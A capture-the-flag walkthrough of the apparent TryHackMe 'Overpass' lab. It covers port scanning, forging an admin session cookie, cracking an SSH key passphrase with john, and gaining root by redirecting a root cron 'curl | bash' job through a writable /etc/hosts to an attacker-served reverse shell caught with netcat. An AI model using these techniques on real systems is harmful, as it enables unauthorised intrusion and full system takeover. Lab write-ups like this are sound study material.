-A: Scan in Aggressive Mode(Traceroout, OS detection,)
-oN: Save Output in Normal Format
Scan Results/Report
Nmap scan report for 10.10.13.108
Host is up (0.17s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
| 256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
|_ 256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Overpass
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/12%OT=22%CT=1%CU=33529%PV=Y%DS=2%DC=T%G=Y%TM=60EC64B
OS:D%P=i686-pc-windows-windows)SEQ(SP=104%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(CI=Z%II=I)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508
OS:ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W
OS:5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y
OS:%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%
OS:T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE
OS:(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 199/tcp)
HOP RTT ADDRESS
1 176.00 ms 10.8.0.1
2 176.00 ms 10.10.13.108
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.11 seconds
As we can see from the nmap scan report there are 2 open ports
Port 22 for ssh
Port 80 for http
Assumption
As there are two open ports so and now we know our attacking area. SSH required Username and Password or Username and Key to get the system access but that takes time and the success rate is low so we ignore it right now and move into the HTTP. Target has a web server/web application running on port 80 and that has a good area for the attack so we enumerate this and find a way to exploit the system
As we can see from the result that there are hidden directory /admin that have a login panel that required a username and password for login I tried some common passwords like admin:admin and they are incorrect so we bruteforce it for login credentials but in THM hint they say "OWASP Top 10 Vuln! Do NOT bruteforce." so we don't have to bruteforce this we have to find a vulnerability from its source code and press CTRL + U to get the source code and we can see there are three js file on the source
main.js
login.js
cookie.js
The login function is work with the javascript name called login.js as we can see so we can read it to know how login work. As in the login.js file when we see the following function
They are just used if else for login checks. when we enter some credentials they call /api/login to check credentials from creds if the credentials don't match they send a response "Incorrect credentials". Else set a cookie with a javascript function cookie. set with the SessionToken with the value statusorcookie variable response now further check for session token so we can use it with our own made session token with the value of something we want with following js function
cookies.set("SessionToken", "admin")
Use this function of your browser js console in inspector mode/Develpor Mode use CTRL + SHIFT + I in Chrome to go to inspector mode when you use this function on your browser console they set a cookie with the `session token with the value admin so just reload the page and you got a login to the Administrator area
There you can see some messages to the person named James that says
Since you keep forgetting your password, James, I've set up SSH keys for you.
If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.
Also, we need to talk about this "Military Grade" encryption. - Paradox
This message has an SSH private key for user James but this private key has a password on it but we can crack it
Exploitation
So we have an SSH private key for user James but this key has a password set on the key so we have to crack that ssh key password first to login to the system first so to do that we have to copy the private key to a file, for now, I name it id.rsa
This command first changes the ssh private key format into a hash format that the JohnTheRipper tool will understand and save it into your system directory with the name id.hash. Now we can crack that hash with john/JohnTheRipper
Tool: john
Command:
$ john id.hash --wordlist= rockyou.txt
johnThis is a tool used to crack password hashes
id.hashThis is the hash file that creates by the ssh2john in the above task
--wordlist=This is used to specify password wordlist i.e rockyou.txt
Result:
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OpenSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
james13 (id.rsa)
1g 0:00:00:10 DONE (2021-07-13 13:34) 0.09699g/s 1391Kp/s 1391Kc/s 1391KC/sa6_123..*7¡Vamos!
Session completed
This command gives us the password of the private key so now we can login to the James user using ssh
Initial Access
So we have the Private key, Username, and Private Key password so now we are fully capable of login into the system but first we have to change the private key permission as only we can read and write it no one else
Command:
$ chmod 600 id.rsa
This command changes the permission of the private key so only we can read it
Now time to login using ssh
$ ssh -I id.rsa james@IP_Address_here
Result:
└─$ ssh -I id.rsa james@10.10.179.213
The authenticity of host '10.10.179.213 (10.10.179.213)' can't be established.
ECDSA key fingerprint is SHA256:4P0PNh/u8bKjshfc6DBYwWnjk1Txh5laY/WbVPrCUdY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.179.213' (ECDSA) to the list of known hosts.
Enter the passphrase for key 'id.rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-108-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Jul 13 08:52:08 UTC 2021
System load: 0.08 Processes: 88
Usage of /: 22.3% of 18.57GB Users logged in: 0
Memory usage: 14% IP address for eth0: 10.10.179.213
Swap usage: 0%
47 packages can be updated.
0 updates are security updates.
Last login: Sat Jun 27 04:45:40 2020 from 192.168.170.1
james@overpass-prod:~$
So we have now access to the James user. use the *ls command to see the files
james@overpass-prod:~$ ls
todo.txt user.txt
Catuser.txt file to see the flag.
Privilege Escalation
There is also a file name todo.txt as you can see above and this has the following thing this show on the last line they update the overpass build on the website from somewhere on the system using some unknown method for us
$ cat todo.txt
To Do:
> Update Overpass Encryption, Muirland has been complaining that it's not strong enough
> Write down my password somewhere on a sticky note so that I don't forget it.
Wait, we make a password manager. Why don't I just use that?
> Test Overpass for macOS, it builds fine but I'm not sure it works
> Ask Paradox how he got the automated build script working and where the builds go.
They're not updating the website
So let's start exploring some priv-escalation vectors
First search some SUID binaries using the find command like following
So we could not find something interesting in SUID bit binaries so we have to dig more
Search for common files like
/etc/shadow
/etc/passwd
/etc/crontab
/etc/hosts
$ ls -al /etc/crontab /etc/shadow /etc/passwd /etc/hosts
-rw-r--r-- 1 root root 822 Jun 27, 2020,/etc/crontab
-rw-rw-rw- 1 root root 250 Jun 27 2020 /etc/hosts
-rw-r--r-- 1 root root 1614 Jun 27 2020 /etc/passwd
-rw-r----- 1 root shadow 1064 Jun 27 2020 /etc/shadow
As we can see from above the *crontab file is readable so we can check it
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# Update builds from the latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
So the crontab the file shows us the method they use to update their overpass build with the latest code. They use curl to the overpass.thm/downloads/src/buildscript.sh and pipe this into bash and they are run as a root so this will be our priv-escalation vector if we can abuse this. We know from the Above that the/etc/hosts file are read and writable so we can use this to change its local DNS file and leverage it into run our own script that gives us a root shell by using the following commands
$ nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 overpass-prod
10.8.186.33 overpass.thm # This is my THM IP Change this IP with your IP Address
# The following lines are desirable for IPv6-capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
This is the content of the /etc/hosts file and I change the 127.0.0.1 IP of the 3rd line with my machine IP Address. Now go to your machine and make a directories name downloads/src/ like the following
$ mkdir -p downloads/src/
This will create a downloads directory and inside it they also create src directory
Now go src directory using the following command
$ cd downloads/src
Now make a file with the name buildscript.sh
$ touch buildscript.sh
Now write the file with the following revershell in the file
Note: Change the IP Address with your machine IP and PORT with 8080
Now start the Python server Using the following command
$ sudo python -m http.server 80
Note: Start the server on the same directory where you create downloads directory not in the src directory
Now open a listener on the system using the following command
$ nc -lnvp 8080
Now wait for the script to execute on the system. When the script executes on the system you got the connection from your nc listener and your got root access to the system